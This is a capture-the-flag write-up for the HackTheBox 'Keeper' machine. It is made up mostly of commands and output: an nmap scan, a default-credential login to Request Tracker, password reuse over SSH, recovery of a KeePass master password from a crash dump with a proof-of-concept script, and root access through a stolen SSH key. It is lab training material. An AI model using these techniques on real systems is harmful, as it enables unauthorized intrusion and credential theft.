4 minutes
HackTheBox :: Keeper
Creator: knightmare
Machine URL: https://app.hackthebox.com/machines/Keeper
Difficulty: Easy
Initial enumeration
As usual, we start with a TCP nmap scan.
# Nmap 7.94 scan initiated Sat Aug 12 21:03:18 2023 as: nmap -p- -oA nmap/nmap_initial --min-rate=4000 -vv -sC -sV 10.129.229.41
Nmap scan report for keeper.htb (10.129.229.41)
Host is up, received echo-reply ttl 63 (0.037s latency).
Scanned at 2023-08-12 21:03:19 CEST for 24s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKHZRUyrg9VQfKeHHT6CZwCwu9YkJosNSLvDmPM9EC0iMgHj7URNWV3LjJ00gWvduIq7MfXOxzbfPAqvm2ahzTc=
| 256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBe5w35/5klFq1zo5vISwwbYSVy1Zzy+K9ZCt0px+goO
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 12 21:03:43 2023 -- 1 IP address (1 host up) scanned in 25.48 seconds
Only two ports are open: TCP 80 for nginx and TCP 22 for SSH.
We will target the Web Server on TCP 80 first.
nginx
After navigating to the machine IP in the browser, we are greeted with a simple web page:
After adding keeper.htb and tickets.keeper.htb to our hosts file, we can visit http://tickets.keeper.htb/rt/
Best Practical Request Tracker (RT)
We have the login page for Best Practical Request Tracker (RT):
Software version: 4.4.4
Source code: GitHub
We note that the version is fairly old and we may find some unpatched vulnerabilities.
But first, we can try the default username and password.
Fortunately, root:password works!
Interesting tickets
There is only one of interest – http://tickets.keeper.htb/rt/Ticket/Display.html?id=300000
We note the info it gives us:
- root (Enoch Root) had issues with a KeePass database on Windows and attached its crash dump to an issue.
- lnorgaard (Lise Nørgaard) removed the attachment and saved it to their home folder for security reasons.
Credentials for lnorgaard
While further walking the app, in the Admin –> Users section we find a default password for user lnorgaard in their comments section:
http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27
These credentials are reused and we can SSH to the box as lnorgaard.
lnorgaard
Grab a user flag in /home/lnorgaard/user.txt
The home folder contains a ZIP archive RT30000.zip. This must be the file relevant to the ticket we’ve seen before.
Transfer it to the attacking machine and unzip it.
┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ unzip RT30000.zip
Archive: RT30000.zip
inflating: KeePassDumpFull.dmp
extracting: passcodes.kdbx
We get the crash dump for KeePass and a KeePass database file.
Extracting the KeePass master password from the dump file
It may be possible to extract the master password from the dump file!
I’ve attempted to use this Python script for the task: https://github.com/CMEPW/keepass-dump-masterkey
┌──(fluff㉿kali)-[/tmp/keepass-dump-masterkey]
└─$ python3 poc.py -d /opt/ctf/htb/keeper/KeePassDumpFull.dmp
2023-08-12 21:35:47,517 [.] [main] Opened /opt/ctf/htb/keeper/KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
...
There are some issues with special characters. A quick Google search for dgrd med flde reveals the name of the Danish dish – Rødgrød med fløde.
I will use the kpcli utility to interact with the KeePass database file that we have looted.
┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ kpcli
KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/> open passcodes.kdbx
Provide the master password: ************************* #Rødgrød med fløde
Error opening file: Couldn't load the file passcodes.kdbx
Error(s) from File::KeePass:
The database key appears invalid or else the database is corrupt.
kpcli:/> open passcodes.kdbx
Provide the master password: ************************* #rødgrød med fløde
kpcli:/> ls
=== Groups ===
passcodes/
Success! The KeePass database master password is rødgrød med fløde.
Let’s find some credentials.
SSH Private Key for root
kpcli:/> ls *
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
kpcli:/> ls */*
/passcodes/eMail:
/passcodes/General:
/passcodes/Homebanking:
/passcodes/Internet:
/passcodes/Network:
=== Entries ===
0. keeper.htb (Ticketing Server)
1. Ticketing System
/passcodes/Recycle Bin:
=== Entries ===
2. Sample Entry keepass.info
3. Sample Entry #2 keepass.info/help/kb/testform.
/passcodes/Windows:
kpcli:/>
kpcli:/> cd /passcodes/Network
kpcli:/passcodes/Network> ls
=== Entries ===
0. keeper.htb (Ticketing Server)
1. Ticketing System
kpcli:/passcodes/Network> show -f 0
Title: keeper.htb (Ticketing Server)
Uname: root
Pass: <REDACTED>
URL:
Notes: PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
<REDACTED>
It looks like we have a root SSH private key for PuTTY!
Let’s convert it to the OpenSSH-acceptable format with puttygen:
┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ puttygen key.putty -O private-openssh -o id_rsa
And use the key to SSH:
┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ ssh [email protected] -i id_rsa
...
root@keeper:~# id
uid=0(root) gid=0(root) groups=0(root)
root@keeper:~#
We are root!
Grab the root flag in /root/root.txt and we are done.